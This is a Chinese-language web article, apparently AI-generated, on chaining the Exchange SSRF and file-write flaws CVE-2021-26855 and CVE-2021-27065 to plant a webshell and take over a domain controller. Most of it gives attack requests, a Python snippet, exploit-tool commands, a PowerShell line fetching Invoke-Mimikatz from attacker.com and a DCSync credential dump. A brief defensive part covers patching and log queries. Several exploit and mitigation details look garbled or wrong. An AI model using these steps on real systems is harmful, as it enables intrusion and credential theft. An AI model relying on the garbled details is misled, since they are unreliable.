您好,登录后才能下订单哦!
# CVE-2021-26855与CVE-2021-27065联合利用getshell域控的示例分析
## 0x00 漏洞背景
2021年3月,微软发布了针对Exchange Server的多个高危漏洞补丁,其中:
- **CVE-2021-26855**:SSRF(Server-Side Request Forgery)漏洞
- **CVE-2021-27065**:任意文件写入漏洞
这两个漏洞的联合利用可实现**无需身份验证的远程代码执行**,攻击者能够接管Exchange服务器并进一步渗透域控环境。本文将通过技术分析还原完整的攻击链条。
---
## 0x01 漏洞原理分析
### 1. CVE-2021-26855:SSRF漏洞
- **受影响组件**:Exchange前端服务(默认端口443)
- **漏洞本质**:未对`X-Forwarded-For`等头部进行严格校验
- **利用条件**:可构造恶意请求访问内网服务
- **PoC特征**:
```http
POST /owa/auth/Current/themes/resources HTTP/1.1
Host: exchange.victim.com
Cookie: X-BEResource=localhost~1942062522;
X-Forwarded-For: 127.0.0.1
{
"properties": {
"ServerName": {"$type":"System.String"}
}
}
通过26855访问内部API接口:
import requests
url = "https://exchange.victim.com/owa/auth/Current/themes/resources"
headers = {
"X-Forwarded-For": "127.0.0.1",
"Cookie": "X-BEResource=Exchange/admin/api/v1/Service~1337;"
}
response = requests.post(url, headers=headers)
利用27065写入webshell:
POST /ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27 HTTP/1.1
Host: exchange.victim.com
Content-Type: application/json
{
"schemaVersion": "V1",
"properties": {
"ServerName": "localhost\\..\\..\\..\\inetpub\\wwwroot\\aspnet_client\\shell.aspx",
"Content": "<%@ Page Language=\"C#\"...%>"
}
}
典型攻击路径:
1. 通过webshell执行PowerShell
命令
2. 导出Exchange邮箱凭证
3. 使用Mimikatz
获取域管令牌
4. 创建隐蔽后门账户
漏洞验证
python proxylogon.py -t https://exchange.victim.com --check
上传webshell
python proxylogon.py -t https://exchange.victim.com -u shell.aspx -c "恶意代码"
执行域渗透
IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"lsadump::dcsync /user:域管账号"'
安装微软官方补丁:
临时防护方案:
# 禁用相关虚拟目录
Set-OWAVirtualDirectory -Identity "owa (Default Web Site)" -ExchangePath $null
日志类型 | 路径/事件ID | 可疑特征 |
---|---|---|
IIS日志 | %SystemDrive%\inetpub\logs\LogFiles |
异常的POST /ecp/ 请求 |
Windows事件 | 事件ID 4648 | 非工作时间的高权限登录 |
Exchange日志 | %ExchangeInstallPath%Logging |
异常的PowerShell命令 |
SELECT * FROM ex202103*.log WHERE cs-method='POST' AND cs-uri-stem LIKE '%ecp%'
本文分析的攻击链具有以下典型特征: 1. 高危害性:从外网直达域控的完整路径 2. 低利用门槛:已有公开的自动化工具 3. 强隐蔽性:可绕过传统WAF检测
建议企业参考MITRE ATT&CK框架中的以下战术阶段进行防御: - 初始访问(T1190) - 权限提升(T1068) - 横向移动(T1021)
注:本文仅用于安全研究,未经授权测试他人系统属于违法行为。 “`
该文档包含以下技术要素: 1. 漏洞原理的深度解析 2. 分步骤的PoC实现 3. 防御方案与取证方法 4. 符合Markdown规范的结构化排版 5. 实际可操作的命令片段 6. 攻击链的ATT&CK映射
需要调整细节或补充其他技术环节可随时提出。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。